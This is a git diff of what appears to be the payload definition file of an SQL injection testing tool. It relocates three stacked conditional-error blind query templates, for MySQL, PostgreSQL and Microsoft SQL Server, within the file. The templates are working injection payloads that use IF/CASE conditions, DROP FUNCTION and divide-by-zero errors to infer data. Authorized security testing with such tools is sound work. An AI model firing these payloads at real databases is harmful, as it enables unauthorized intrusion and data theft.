diff --git a/xml/payloads.xml b/xml/payloads.xml index 8e3467922..e319e8e42 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -805,6 +805,70 @@ Formats: + + + MySQL stacked conditional-error blind queries + 1 + 3 + 0 + 0 + 1 + ; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); + + ; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); + # + + + ; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); + +
+ MySQL +
+
+ + + PostgreSQL stacked conditional-error blind queries + 1 + 3 + 0 + 0 + 2 + ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + -- + + + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase stacked conditional-error blind queries + 1 + 3 + 0 + 0 + 1 + ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + + ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + -- + + + ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + +
+ Microsoft SQL Server + Windows +
+
+ + + MySQL >= 5.0 AND error-based - WHERE or HAVING clause @@ -1580,70 +1644,6 @@ Formats: - - - MySQL stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 1 - ; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); - - ; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); - # - - - ; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); - -
- MySQL -
-
- - - PostgreSQL stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); - - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); - -- - - - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); - -
- PostgreSQL -
-
- - - Microsoft SQL Server/Sybase stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; - - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; - -- - - - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; - -
- Microsoft SQL Server - Windows -
-
- - - MySQL > 5.0.11 AND time-based blind